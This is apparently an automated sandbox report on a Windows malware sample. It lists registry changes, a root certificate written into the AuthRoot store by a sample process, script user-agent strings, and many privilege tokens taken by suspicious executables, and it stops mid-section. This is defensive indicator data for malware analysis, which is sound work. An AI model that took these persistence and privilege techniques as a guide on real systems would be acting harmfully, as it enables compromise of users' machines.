\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dfff1540424edb47d450dd49d084297dce82e72baa46d34fdc48d541dfed39e7587cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd988b07e2dec915e03c8c4e13b7e85c12b496da0f15d15d88448733ae4a5501af4 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeOneDriveSetup.exeFileSyncConfig.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{9B0E3558-B836-49EA-A3C8-08F6C84DDEE2} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\ProgID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66" FileSyncConfig.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{B5C25645-7426-433F-8A5F-42B7FF27A7B2}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\PROXYSTUBCLSID32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ = "ISyncChangesCallback" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Japanese Phone Converter" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler.1 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ = "ISyncEngineCOMServer" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "1033" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\OOBERequestHandler.OOBERequestHandler OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\ = "SyncingOverlayHandler Class" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator\ = "NucleusToastActivator Class" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\FLAGS OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\PROGID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON FileSyncConfig.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "57" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "MS-1033-110-WINMO-DNN" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32 OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "316" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "395" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = b9d9ec28329fd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LOCALSERVER32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\amd64\\FileSyncShell64.dll" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "363" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ = "IFileSyncClient" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\INPROCSERVER32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32 OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "357" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator\CLSID\ = "{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ = "NucleusToastActivator Class" OneDriveSetup.exe -
Processes:
Sat200240b71b.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sat200240b71b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sat200240b71b.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSat20de8d8504.exeSat20ecdfe3ee79f.exepid process 3024 powershell.exe 3024 powershell.exe 4632 Sat20de8d8504.exe 4632 Sat20de8d8504.exe 3024 powershell.exe 3024 powershell.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe 1016 Sat20ecdfe3ee79f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3040 Explorer.EXE -
Suspicious behavior: MapViewOfSection 21 IoCs
Processes:
Sat20de8d8504.exeALU9NmuUdiXkXK7aVOwsE9z7.execyhXA10eOOPKGx2fm1TIDtyP.exe3CD9.execompattelrunner.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeustucsuustucsupid process 4632 Sat20de8d8504.exe 6404 ALU9NmuUdiXkXK7aVOwsE9z7.exe 8888 cyhXA10eOOPKGx2fm1TIDtyP.exe 7452 3CD9.exe 7364 compattelrunner.exe 7780 MicrosoftEdgeCP.exe 7780 MicrosoftEdgeCP.exe 7780 MicrosoftEdgeCP.exe 7780 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 3160 ustucsu 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe 1000 ustucsu 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sat20873bc74eb80e0.exeSat205eb4a2ece877a.exeSat20ed203af5.exepowershell.exeSat2071d99516dc03841.exeZe2ro.exeExplorer.EXE7541406.scrWerFault.exe2.exePublicDwlBrowser1100.exe5125044.scrrundll32.exeaskinstall58.exedescription pid process Token: SeCreateTokenPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeAssignPrimaryTokenPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeLockMemoryPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeIncreaseQuotaPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeMachineAccountPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeTcbPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeSecurityPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeTakeOwnershipPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeLoadDriverPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeSystemProfilePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeSystemtimePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeProfSingleProcessPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeIncBasePriorityPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeCreatePagefilePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeCreatePermanentPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeBackupPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeRestorePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeShutdownPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeDebugPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeAuditPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeSystemEnvironmentPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeChangeNotifyPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeRemoteShutdownPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeUndockPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeSyncAgentPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeEnableDelegationPrivilege 4108 Sat20873bc74eb80e0.exe Token: SeManageVolumePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeImpersonatePrivilege 4108 Sat20873bc74eb80e0.exe Token: SeCreateGlobalPrivilege 4108 Sat20873bc74eb80e0.exe Token: 31 4108 Sat20873bc74eb80e0.exe Token: 32 4108 Sat20873bc74eb80e0.exe Token: 33 4108 Sat20873bc74eb80e0.exe Token: 34 4108 Sat20873bc74eb80e0.exe Token: 35 4108 Sat20873bc74eb80e0.exe Token: SeDebugPrivilege 4604 Sat205eb4a2ece877a.exe Token: SeDebugPrivilege 4600 Sat20ed203af5.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 4444 Sat2071d99516dc03841.exe Token: SeDebugPrivilege 3356 Ze2ro.exe Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeDebugPrivilege 4456 7541406.scr Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeRestorePrivilege 1848 WerFault.exe Token: SeBackupPrivilege 1848 WerFault.exe Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeDebugPrivilege 4384 2.exe Token: SeShutdownPrivilege 3040 Explorer.EXE Token: SeCreatePagefilePrivilege 3040 Explorer.EXE Token: SeDebugPrivilege 2700 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 2468 5125044.scr Token: SeDebugPrivilege 3504 rundll32.exe Token: SeDebugPrivilege 1848 WerFault.exe Token: SeCreateTokenPrivilege 3360 askinstall58.exe Token: SeAssignPrimaryTokenPrivilege 3360 askinstall58.exe Token: SeLockMemoryPrivilege 3360 askinstall58.exe Token: SeIncreaseQuotaPrivilege 3360 askinstall58.exe Token: SeMachineAccountPrivilege 3360 askinstall58.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
Processes:
